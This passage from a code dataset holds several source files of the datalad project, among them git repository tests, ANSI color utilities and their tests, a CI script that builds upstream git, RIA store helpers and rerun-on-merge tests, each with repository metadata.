gr.commit(msg=\"c1\")\n assert_false(ar.is_under_annex(\"foo\"))\n\n\n@with_tree({\"foo\": \"foo\", \"bar\": \"bar\"})\ndef test_gitrepo_call_git_methods(path=None):\n gr = GitRepo(path)\n gr.add([\"foo\", \"bar\"])\n gr.commit(msg=\"foobar\")\n gr.call_git([\"mv\"], files=[\"foo\", \"foo.txt\"])\n ok_(op.exists(op.join(gr.path, 'foo.txt')))\n\n for expect_fail, check in [(False, assert_in),\n (True, assert_not_in)]:\n with swallow_logs(new_level=logging.DEBUG) as cml:\n with assert_raises(CommandError):\n gr.call_git([\"mv\"], files=[\"notthere\", \"dest\"],\n expect_fail=expect_fail)\n check(\"fatal: bad source\", cml.out)\n\n eq_(list(gr.call_git_items_([\"ls-files\"], read_only=True)),\n [\"bar\", \"foo.txt\"])\n eq_(list(gr.call_git_items_([\"ls-files\", \"-z\"], sep=\"\\0\", read_only=True)),\n [\"bar\", \"foo.txt\"])\n\n with assert_raises(AssertionError):\n gr.call_git_oneline([\"ls-files\"], read_only=True)\n\n eq_(gr.call_git_oneline([\"ls-files\"], files=[\"bar\"], read_only=True),\n \"bar\")\n\n ok_(gr.call_git_success([\"rev-parse\", \"HEAD^{commit}\"], read_only=True))\n with swallow_logs(new_level=logging.DEBUG) as cml:\n assert_false(gr.call_git_success([\"rev-parse\", \"HEAD^{blob}\"],\n read_only=True))\n assert_not_in(\"expected blob type\", cml.out)\n\n\n@integration\n # http is well tested already\n # 'git' is not longer supported\[email protected](\"proto\", [\"https\"])\n@skip_if_no_network\n@with_tempfile\ndef test_protocols(destdir=None, *, proto):\n # git-annex-standalone build can get git bundle which would fail to\n # download via https, resulting in messages such as\n # fatal: unable to find remote helper for 'https'\n # which happened with git-annex-standalone 7.20191017+git2-g7b13db551-1~ndall+1\n GitRepo.clone('%s://github.com/datalad-tester/testtt' % proto, destdir)\n\n@with_tempfile\ndef test_gitrepo_push_default_first_kludge(path=None):\n path = Path(path)\n repo_a = GitRepo(path / \"a\", bare=True)\n repo_b = GitRepo.clone(repo_a.path, str(path / \"b\"))\n\n (repo_b.pathobj / \"foo\").write_text(\"foo\")\n repo_b.save()\n\n # push() usually pushes all refspecs in one go.\n with swallow_logs(new_level=logging.DEBUG) as cml:\n res_oneshot = repo_b.push(remote=DEFAULT_REMOTE,\n refspec=[DEFAULT_BRANCH + \":b-oneshot\",\n DEFAULT_BRANCH + \":a-oneshot\",\n DEFAULT_BRANCH + \":c-oneshot\"])\n cmds_oneshot = [ln for ln in cml.out.splitlines()\n if \"Run\" in ln and \"push\" in ln and DEFAULT_BRANCH in ln]\n eq_(len(cmds_oneshot), 1)\n assert_in(\":a-oneshot\", cmds_oneshot[0])\n assert_in(\":b-oneshot\", cmds_oneshot[0])\n assert_in(\":c-oneshot\", cmds_oneshot[0])\n eq_(len(res_oneshot), 3)\n\n # But if datalad-push-default-first is set...\n cfg_var = f\"remote.{DEFAULT_REMOTE}.datalad-push-default-first\"\n repo_b.config.set(cfg_var, \"true\", scope=\"local\")\n with swallow_logs(new_level=logging.DEBUG) as cml:\n res_twoshot = repo_b.push(remote=DEFAULT_REMOTE,\n refspec=[DEFAULT_BRANCH + \":b-twoshot\",\n DEFAULT_BRANCH + \":a-twoshot\",\n DEFAULT_BRANCH + \":c-twoshot\"])\n cmds_twoshot = [ln for ln in cml.out.splitlines()\n if \"Run\" in ln and \"push\" in ln and DEFAULT_BRANCH in ln]\n # ... there are instead two git-push calls.\n eq_(len(cmds_twoshot), 2)\n # The first is for the first item of the refspec.\n assert_in(\":b-twoshot\", cmds_twoshot[0])\n assert_not_in(\":b-twoshot\", cmds_twoshot[1])\n # The remaining items are in the second call.\n assert_in(\":a-twoshot\", cmds_twoshot[1])\n assert_in(\":c-twoshot\", cmds_twoshot[1])\n assert_not_in(\":c-twoshot\", cmds_twoshot[0])\n assert_not_in(\":a-twoshot\", cmds_twoshot[0])\n # The result returned by push() has the same number of records, though.\n eq_(len(res_twoshot), 3)\n # The configuration variable is removed afterward.\n assert_false(repo_b.config.get(cfg_var))\n" }, { "alpha_fraction": 0.5805829763412476, "alphanum_fraction": 0.5981690883636475, "avg_line_length": 41.35714340209961, "blob_id": "55fb1815eb510bf380479f79efdd8cd66ae843fa", "content_id": "8ff4e1fd64da9a327932e8d8cd221fcf3b6e8b4c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4151, "license_type": "permissive", "max_line_length": 97, "num_lines": 98, "path": "/datalad/support/tests/test_ansi_colors.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test ANSI color tools \"\"\"\n\nimport os\nfrom unittest.mock import patch\n\nfrom datalad.support import ansi_colors as colors\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n patch_config,\n)\n\n\ndef test_color_enabled():\n # In the absence of NO_COLOR, follow ui.color, or ui.is_interactive if 'auto'\n with patch.dict(os.environ), \\\n patch('datalad.support.ansi_colors.ui'):\n os.environ.pop('NO_COLOR', None)\n for is_interactive in (True, False):\n colors.ui.is_interactive = is_interactive\n with patch_config({'datalad.ui.color': 'off'}):\n assert_equal(colors.color_enabled(), False)\n with patch_config({'datalad.ui.color': 'on'}):\n assert_equal(colors.color_enabled(), True)\n with patch_config({'datalad.ui.color': 'auto'}):\n assert_equal(colors.color_enabled(), is_interactive)\n\n # In the presence of NO_COLOR, default to disable, unless ui.color is \"on\"\n # The value of NO_COLOR should have no effect, so try true-ish and false-ish values\n for NO_COLOR in (\"\", \"1\", \"0\"):\n with patch.dict(os.environ, {'NO_COLOR': NO_COLOR}), \\\n patch('datalad.support.ansi_colors.ui'):\n for is_interactive in (True, False):\n colors.ui.is_interactive = is_interactive\n with patch_config({'datalad.ui.color': 'on'}):\n assert_equal(colors.color_enabled(), True)\n for ui_color in ('off', 'auto'):\n with patch_config({'datalad.ui.color': ui_color}):\n assert_equal(colors.color_enabled(), False)\n\n#\n# In all other tests, just patch color_enabled\n#\n\n\ndef test_format_msg():\n fmt = r'a$BOLDb$RESETc$BOLDd$RESETe'\n for enabled in (True, False):\n with patch('datalad.support.ansi_colors.color_enabled', lambda: enabled):\n assert_equal(colors.format_msg(fmt), 'abcde')\n assert_equal(colors.format_msg(fmt, use_color=False), 'abcde')\n\n with patch('datalad.support.ansi_colors.color_enabled', lambda: False):\n for use_color in (True, False):\n assert_equal(colors.format_msg(fmt), 'abcde')\n assert_equal(colors.format_msg(fmt, use_color=use_color), 'abcde')\n\n with patch('datalad.support.ansi_colors.color_enabled', lambda: True):\n assert_equal(colors.format_msg(fmt, use_color=True), 'a\\033[1mb\\033[0mc\\033[1md\\033[0me')\n\n\ndef test_color_word():\n s = 'word'\n green_s = '\\033[1;32mword\\033[0m'\n for enabled in (True, False):\n with patch('datalad.support.ansi_colors.color_enabled', lambda: enabled):\n assert_equal(colors.color_word(s, colors.GREEN, force=True), green_s)\n\n with patch('datalad.support.ansi_colors.color_enabled', lambda: True):\n assert_equal(colors.color_word(s, colors.GREEN), green_s)\n assert_equal(colors.color_word(s, colors.GREEN, force=False), green_s)\n\n with patch('datalad.support.ansi_colors.color_enabled', lambda: False):\n assert_equal(colors.color_word(s, colors.GREEN), s)\n assert_equal(colors.color_word(s, colors.GREEN, force=False), s)\n\n\ndef test_color_status():\n # status -> (plain, colored)\n statuses = {\n 'ok': ('ok', '\\033[1;32mok\\033[0m'),\n 'notneeded': ('notneeded', '\\033[1;32mnotneeded\\033[0m'),\n 'impossible': ('impossible', '\\033[1;33mimpossible\\033[0m'),\n 'error': ('error', '\\033[1;31merror\\033[0m'),\n 'invalid': ('invalid', 'invalid'),\n }\n\n for enabled in (True, False):\n with patch('datalad.support.ansi_colors.color_enabled', lambda: enabled):\n for status, retopts in statuses.items():\n assert_equal(colors.color_status(status), retopts[enabled])\n" }, { "alpha_fraction": 0.6636363863945007, "alphanum_fraction": 0.668181836605072, "avg_line_length": 19, "blob_id": "43a15af485f572f0d4f47d4c27213a4161bf5025", "content_id": "e61f137107d4fb58b8200f5b378faae5eeb3a5a5", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 220, "license_type": "permissive", "max_line_length": 50, "num_lines": 11, "path": "/tools/ci/install-upstream-git.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\ntarget_dir=\"$PWD/git-src\"\ngit clone https://github.com/git/git \"$target_dir\"\n(\n cd \"$target_dir\"\n git checkout origin/master\n make --jobs 2\n)\nexport PATH=\"$target_dir/bin-wrappers/:$PATH\"\ngit version\n" }, { "alpha_fraction": 0.6046624183654785, "alphanum_fraction": 0.6064742207527161, "avg_line_length": 33.0699577331543, "blob_id": "665b191c17277c643e83652c2eb62f25d9f32c58", "content_id": "d009ea4737f094b25fb6b57ea470de51cbc48051", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8281, "license_type": "permissive", "max_line_length": 87, "num_lines": 243, "path": "/datalad/customremotes/ria_utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Helper for RIA stores\n\n\"\"\"\nimport logging\nfrom pathlib import Path\n\n\nlgr = logging.getLogger('datalad.customremotes.ria_utils')\n\n\nclass UnknownLayoutVersion(Exception):\n pass\n\n\n# TODO: Make versions a tuple of (label, description)?\n# Object tree versions we introduced so far. This is about the layout within a\n# dataset in a RIA store\nknown_versions_objt = ['1', '2']\n# Dataset tree versions we introduced so far. This is about the layout of\n# datasets in a RIA store\nknown_versions_dst = ['1']\n\n\n# TODO: This is wrong and should consider both versions (store+dataset)\ndef get_layout_locations(version, base_path, dsid):\n \"\"\"Return dataset-related path in a RIA store\n\n Parameters\n ----------\n version : int\n Layout version of the store.\n base_path : Path\n Base path of the store.\n dsid : str\n Dataset ID\n\n Returns\n -------\n Path, Path, Path\n The location of the bare dataset repository in the store,\n the directory with archive files for the dataset, and the\n annex object directory are return in that order.\n \"\"\"\n if version == 1:\n dsgit_dir = base_path / dsid[:3] / dsid[3:]\n archive_dir = dsgit_dir / 'archives'\n dsobj_dir = dsgit_dir / 'annex' / 'objects'\n return dsgit_dir, archive_dir, dsobj_dir\n else:\n raise ValueError(\"Unknown layout version: {}. Supported: {}\"\n \"\".format(version, known_versions_dst))\n\n\ndef verify_ria_url(url, cfg):\n \"\"\"Verify and decode ria url\n\n Expects a ria-URL pointing to a RIA store, applies rewrites and tries to\n decode potential host and base path for the store from it. Additionally\n raises if `url` is considered invalid.\n\n ria+ssh://somehost:/path/to/store\n ria+file:///path/to/store\n\n Parameters\n ----------\n url : str\n URL to verify an decode.\n cfg : dict-like\n Configuration settings for rewrite_url()\n\n Raises\n ------\n ValueError\n\n Returns\n -------\n tuple\n (host, base-path, rewritten url)\n `host` is not just a hostname, but is a stub URL that may also contain\n username, password, and port, if specified in a given URL.\n `base-path` is the unquoted path component of the url\n \"\"\"\n from datalad.config import rewrite_url\n from datalad.support.network import URL\n\n if not url:\n raise ValueError(\"Got no URL\")\n\n url = rewrite_url(cfg, url)\n url_ri = URL(url)\n if not url_ri.scheme.startswith('ria+'):\n raise ValueError(\"Missing ria+ prefix in final URL: %s\" % url)\n if url_ri.fragment:\n raise ValueError(\n \"Unexpected fragment in RIA-store URL: %s\" % url_ri.fragment)\n protocol = url_ri.scheme[4:]\n if protocol not in ['ssh', 'file', 'http', 'https']:\n raise ValueError(\"Unsupported protocol: %s. \"\n \"Supported: ssh, file, http(s)\" %\n protocol)\n\n host = '{proto}://{user}{pdlm}{passwd}{udlm}{host}{portdlm}{port}'.format(\n proto=protocol,\n user=url_ri.username or '',\n pdlm=':' if url_ri.password else '',\n passwd=url_ri.password or '',\n udlm='@' if url_ri.username else '',\n host=url_ri.hostname or '',\n portdlm=':' if url_ri.port else '',\n port=url_ri.port or '',\n )\n # this ``!= 'file'´´ is critical behavior, if removed, it will ruin the IO\n # selection in ORARemote!!\n return host if protocol != 'file' else None, url_ri.path or '/', url\n\n\ndef _ensure_version(io, base_path, version):\n \"\"\"Check a store or dataset version and make sure it is declared\n\n Parameters\n ----------\n io: SSHRemoteIO or LocalIO\n base_path: Path\n root path of a store or dataset\n version: str\n target layout version of the store (dataset tree)\n \"\"\"\n version_file = base_path / 'ria-layout-version'\n if io.exists(version_file):\n existing_version = io.read_file(version_file).split('|')[0].strip()\n if existing_version != version.split('|')[0]:\n # We have an already existing location with a conflicting version on\n # record.\n # Note, that a config flag after pipe symbol is fine.\n raise ValueError(\"Conflicting version found at target: {}\"\n .format(existing_version))\n else:\n # already exists, recorded version fits - nothing to do\n return\n # Note, that the following does create the base-path dir as well, since\n # mkdir has parents=True:\n io.mkdir(base_path)\n io.write_file(version_file, version)\n\n\ndef create_store(io, base_path, version):\n \"\"\"Helper to create a RIA store\n\n Note, that this is meant as an internal helper and part of intermediate\n RF'ing. Ultimately should lead to dedicated command or option for\n create-sibling-ria.\n\n Parameters\n ----------\n io: SSHRemoteIO or LocalIO\n Respective execution instance.\n Note: To be replaced by proper command abstraction\n base_path: Path\n root path of the store\n version: str\n layout version of the store (dataset tree)\n \"\"\"\n\n # At store level the only version we know as of now is 1.\n if version not in known_versions_dst:\n raise UnknownLayoutVersion(\"RIA store layout version unknown: {}.\"\n \"Supported versions: {}\"\n .format(version, known_versions_dst))\n _ensure_version(io, base_path, version)\n error_logs = base_path / 'error_logs'\n io.mkdir(error_logs)\n\n\ndef create_ds_in_store(io, base_path, dsid, obj_version, store_version,\n alias=None, init_obj_tree=True):\n \"\"\"Helper to create a dataset in a RIA store\n\n Note, that this is meant as an internal helper and part of intermediate\n RF'ing. Ultimately should lead to a version option for create-sibling-ria\n in conjunction with a store creation command/option.\n\n Parameters\n ----------\n io: SSHRemoteIO or LocalIO\n Respective execution instance.\n Note: To be replaced by proper command abstraction\n base_path: Path\n root path of the store\n dsid: str\n dataset id\n store_version: str\n layout version of the store (dataset tree)\n obj_version: str\n layout version of the dataset itself (object tree)\n alias: str, optional\n alias for the dataset in the store\n init_obj_tree: bool\n whether or not to create the base directory for an annex objects tree (\n 'annex/objects')\n \"\"\"\n\n # TODO: Note for RF'ing, that this is about setting up a valid target\n # for the special remote not a replacement for create-sibling-ria.\n # There's currently no git (bare) repo created.\n\n try:\n # TODO: This is currently store layout version!\n # Too entangled by current get_layout_locations.\n dsgit_dir, archive_dir, dsobj_dir = \\\n get_layout_locations(int(store_version), base_path, dsid)\n except ValueError as e:\n raise UnknownLayoutVersion(str(e))\n\n if obj_version not in known_versions_objt:\n raise UnknownLayoutVersion(\"Dataset layout version unknown: {}. \"\n \"Supported: {}\"\n .format(obj_version, known_versions_objt))\n\n _ensure_version(io, dsgit_dir, obj_version)\n\n io.mkdir(archive_dir)\n if init_obj_tree:\n io.mkdir(dsobj_dir)\n if alias:\n alias_dir = base_path / \"alias\"\n io.mkdir(alias_dir)\n try:\n # go for a relative path to keep the alias links valid\n # when moving a store\n io.symlink(\n Path('..') / dsgit_dir.relative_to(base_path),\n alias_dir / alias)\n except FileExistsError:\n lgr.warning(\"Alias %r already exists in the RIA store, not adding an \"\n \"alias.\", alias)\n" }, { "alpha_fraction": 0.5762974619865417, "alphanum_fraction": 0.5852052569389343, "avg_line_length": 25.89583396911621, "blob_id": "ea3cfb2d32378e59649f8cc37f37318fd475b168", "content_id": "1c7beaf30eb0dc379ae314f9f21c32581392a73f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2582, "license_type": "permissive", "max_line_length": 87, "num_lines": 96, "path": "/datalad/support/ansi_colors.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Definitions for ansi colors etc\"\"\"\n\nfrom __future__ import annotations\n\nimport os\nfrom typing import Optional\n\nfrom .. import cfg\nfrom ..ui import ui\n\nBLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(30, 38)\nBOLD = 1\nUNDERLINE = 4\n\nRESET_SEQ = \"\\033[0m\"\nCOLOR_SEQ = \"\\033[1;%dm\"\nBOLD_SEQ = \"\\033[1m\"\n\nLOG_LEVEL_COLORS = {\n 'WARNING': YELLOW,\n 'INFO': None,\n 'DEBUG': BLUE,\n 'CRITICAL': YELLOW,\n 'ERROR': RED\n}\n\nRESULT_STATUS_COLORS = {\n 'ok': GREEN,\n 'notneeded': GREEN,\n 'impossible': YELLOW,\n 'error': RED\n}\n\n# Aliases for uniform presentation\n\nDATASET = UNDERLINE\nFIELD = BOLD\n\n\ndef color_enabled() -> bool:\n \"\"\"Check for whether color output is enabled\n\n If the configuration value ``datalad.ui.color`` is ``'on'`` or ``'off'``,\n that takes precedence.\n If ``datalad.ui.color`` is ``'auto'``, and the environment variable\n ``NO_COLOR`` is defined (see https://no-color.org), then color is disabled.\n Otherwise, enable colors if a TTY is detected by ``datalad.ui.ui.is_interactive``.\n\n Returns\n -------\n bool\n \"\"\"\n ui_color = cfg.obtain('datalad.ui.color')\n return (ui_color == 'on' or\n ui_color == 'auto' and os.getenv('NO_COLOR') is None and ui.is_interactive)\n\n\ndef format_msg(fmt: str, use_color: bool = False) -> str:\n \"\"\"Replace $RESET and $BOLD with corresponding ANSI entries\"\"\"\n if color_enabled() and use_color:\n return fmt.replace(\"$RESET\", RESET_SEQ).replace(\"$BOLD\", BOLD_SEQ)\n else:\n return fmt.replace(\"$RESET\", \"\").replace(\"$BOLD\", \"\")\n\n\ndef color_word(s: str, color: Optional[int], force: bool = False) -> str:\n \"\"\"Color `s` with `color`.\n\n Parameters\n ----------\n s : string\n color : int\n Code for color. If the value evaluates to false, the string will not be\n colored.\n force : boolean, optional\n Color string even when non-interactive session is detected.\n\n Returns\n -------\n str\n \"\"\"\n if color and (force or color_enabled()):\n return \"%s%s%s\" % (COLOR_SEQ % color, s, RESET_SEQ)\n return s\n\n\ndef color_status(status: str) -> str:\n return color_word(status, RESULT_STATUS_COLORS.get(status))\n" }, { "alpha_fraction": 0.4776795506477356, "alphanum_fraction": 0.4814685881137848, "avg_line_length": 28.665374755859375, "blob_id": "c75fc6e7cc474f6b854200d4f3287d9feddf704b", "content_id": "5de6e5ca90565b5ab5d9473eedc889f41614bf28", "detected_licenses": [ "LicenseRef-scancode-unknown-license-reference", "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22961, "license_type": "permissive", "max_line_length": 87, "num_lines": 774, "path": "/datalad/local/tests/test_rerun_merges.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test `datalad rerun` on histories with merges.\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport os.path as op\n\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n assert_false,\n eq_,\n neq_,\n ok_,\n skip_if_adjusted_branch,\n slow,\n with_tempfile,\n)\n\n# Notation in graphs:\n#\n# The initial graph is made up of the following commits:\n#\n# - x_n: commit x without a run command\n# - x_r: commit x with a run command\n#\n# When re-executing a command creates a new commit, it is labeled as one of the\n# following:\n#\n# - x_C: cherry picked\n# - x_M: merge commit\n# - x_R: run commit\n\n\n@slow\n@with_tempfile(mkdir=True)\ndef test_rerun_fastforwardable(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds_repo.checkout(DEFAULT_BRANCH, options=[\"-b\", \"side\"])\n ds.run(\"echo foo >foo\")\n ds_repo.checkout(DEFAULT_BRANCH)\n ds_repo.merge(\"side\", options=[\"-m\", \"Merge side\", \"--no-ff\"])\n # o c_n\n # |\\\n # | o b_r\n # |/\n # o a_n\n\n ds.rerun(since=\"\", onto=\"\")\n # o c_M\n # |\\\n # | o b_R\n # |/\n # o a_n\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"),\n ds_repo.get_hexsha(\"HEAD^\"))\n ok_(ds_repo.commit_exists(\"HEAD^2\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n ds.rerun(since=\"\", onto=DEFAULT_BRANCH + \"^2\")\n # o b_r\n # o a_n\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"),\n ds_repo.get_hexsha())\n\n ds_repo.checkout(DEFAULT_BRANCH)\n hexsha_before = ds_repo.get_hexsha()\n ds.rerun(since=\"\")\n # o c_n\n # |\\\n # | o b_r\n # |/\n # o a_n\n eq_(ds_repo.get_active_branch(), DEFAULT_BRANCH)\n eq_(hexsha_before,\n ds_repo.get_hexsha())\n\n\n@slow\n@with_tempfile(mkdir=True)\ndef test_rerun_fastforwardable_mutator(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds_repo.checkout(DEFAULT_BRANCH, options=[\"-b\", \"side\"])\n ds.run(\"echo foo >>foo\")\n ds_repo.checkout(DEFAULT_BRANCH)\n ds_repo.merge(\"side\", options=[\"-m\", \"Merge side\", \"--no-ff\"])\n # o c_n\n # |\\\n # | o b_r\n # |/\n # o a_n\n\n ds.rerun(since=\"\", onto=DEFAULT_BRANCH + \"^2\")\n # o b_R\n # o b_r\n # o a_n\n neq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"),\n ds_repo.get_hexsha())\n\n ds_repo.checkout(DEFAULT_BRANCH)\n hexsha_before = ds_repo.get_hexsha()\n ds.rerun(since=\"\")\n # o b_R\n # o c_n\n # |\\\n # | o b_r\n # |/\n # o a_n\n eq_(ds_repo.get_active_branch(), DEFAULT_BRANCH)\n assert_false(ds_repo.commit_exists(DEFAULT_BRANCH + \"^2\"))\n eq_(hexsha_before,\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"))\n\n\n@slow\n# test implementation requires checkout of non-adjusted branch\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_rerun_left_right_runs(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds_repo.checkout(DEFAULT_BRANCH, options=[\"-b\", \"side\"])\n ds.run(\"echo foo >foo\")\n ds_repo.checkout(DEFAULT_BRANCH)\n ds.run(\"echo bar >bar\")\n ds_repo.merge(\"side\", options=[\"-m\", \"Merge side\"])\n # o d_n\n # |\\\n # o | c_r\n # | o b_r\n # |/\n # o a_n\n\n ds.rerun(since=\"\", onto=\"\")\n # o d_M\n # |\\\n # o | c_R\n # | o b_R\n # |/\n # o a_n\n neq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"),\n ds_repo.get_hexsha(\"HEAD^\"))\n neq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"),\n ds_repo.get_hexsha(\"HEAD^2\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n ds.rerun(since=\"\", onto=DEFAULT_BRANCH + \"^\")\n # o d_M\n # |\\\n # | o b_R\n # |/\n # o c_r\n # o a_n\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"),\n ds_repo.get_hexsha(\"HEAD^\"))\n neq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"),\n ds_repo.get_hexsha(\"HEAD^2\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n hexsha_before = ds_repo.get_hexsha()\n ds.rerun(since=\"\")\n # o d_n\n # |\\\n # o | c_r\n # | o b_r\n # |/\n # o a_n\n eq_(hexsha_before, ds_repo.get_hexsha())\n\n\n@slow\n# test implementation requires checkout of non-adjusted branch\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_rerun_run_left_mutator_right(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds_repo.checkout(DEFAULT_BRANCH, options=[\"-b\", \"side\"])\n ds.run(\"echo ichange >>ichange\")\n ds_repo.checkout(DEFAULT_BRANCH)\n ds.run(\"echo idont >idont\")\n ds_repo.merge(\"side\", options=[\"-m\", \"Merge side\"])\n # o d_n\n # |\\\n # o | c_r\n # | o b_r\n # |/\n # o a_n\n\n hexsha_before = ds_repo.get_hexsha()\n ds.rerun(since=\"\")\n # o b_R\n # o d_n\n # |\\\n # o | c_r\n # | o b_r\n # |/\n # o a_n\n eq_(ds_repo.get_hexsha(hexsha_before),\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"))\n\n\n@slow\n# test implementation requires checkout of non-adjusted branch\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_rerun_nonrun_left_run_right(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n with open(op.join(path, \"nonrun-file\"), \"w\") as f:\n f.write(\"blah\")\n ds.save()\n ds_repo.checkout(DEFAULT_BRANCH + \"~\", options=[\"-b\", \"side\"])\n ds.run(\"echo foo >foo\")\n ds_repo.checkout(DEFAULT_BRANCH)\n ds_repo.merge(\"side\", options=[\"-m\", \"Merge side\"])\n # o d_n\n # |\\\n # | o c_r\n # o | b_n\n # |/\n # o a_n\n\n ds.rerun(since=\"\", onto=\"\")\n # o d_M\n # |\\\n # | o c_R\n # o | b_n\n # |/\n # o a_n\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"),\n ds_repo.get_hexsha(\"HEAD^\"))\n neq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"),\n ds_repo.get_hexsha(\"HEAD^2\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n ds.rerun(since=\"\", onto=DEFAULT_BRANCH + \"^2\")\n # o d_n\n # |\\\n # | o c_r\n # o | b_n\n # |/\n # o a_n\n ok_(ds_repo.get_active_branch() is None)\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH),\n ds_repo.get_hexsha())\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"),\n ds_repo.get_hexsha(\"HEAD^\"))\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"),\n ds_repo.get_hexsha(\"HEAD^2\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n hexsha_before = ds_repo.get_hexsha()\n ds.rerun(since=\"\")\n # o d_n\n # |\\\n # | o c_r\n # o | b_n\n # |/\n # o a_n\n eq_(hexsha_before, ds_repo.get_hexsha())\n\n\n@slow\n# test implementation requires checkout of non-adjusted branch\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_rerun_run_left_nonrun_right(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds.run(\"echo foo >foo\")\n ds_repo.checkout(DEFAULT_BRANCH + \"~\", options=[\"-b\", \"side\"])\n with open(op.join(path, \"nonrun-file\"), \"w\") as f:\n f.write(\"blah\")\n ds.save()\n ds_repo.checkout(DEFAULT_BRANCH)\n ds_repo.merge(\"side\", options=[\"-m\", \"Merge side\"])\n # o d_n\n # |\\\n # | o c_n\n # o | b_r\n # |/\n # o a_n\n\n ds.rerun(since=\"\", onto=\"\")\n # o d_M\n # |\\\n # | o c_n\n # o | b_R\n # |/\n # o a_n\n neq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"),\n ds_repo.get_hexsha(\"HEAD^\"))\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"),\n ds_repo.get_hexsha(\"HEAD^2\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n ds.rerun(since=\"\", onto=DEFAULT_BRANCH + \"^2\")\n # o b_R\n # o c_n\n # o a_n\n assert_false(ds_repo.commit_exists(\"HEAD^2\"))\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"),\n ds_repo.get_hexsha(\"HEAD^\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n hexsha_before = ds_repo.get_hexsha()\n ds.rerun(since=\"\")\n # o d_n\n # |\\\n # | o c_n\n # o | b_r\n # |/\n # o a_n\n eq_(hexsha_before, ds_repo.get_hexsha())\n\n\n# @slow # ~5sec on Yarik's laptop\n# test implementation requires checkout of non-adjusted 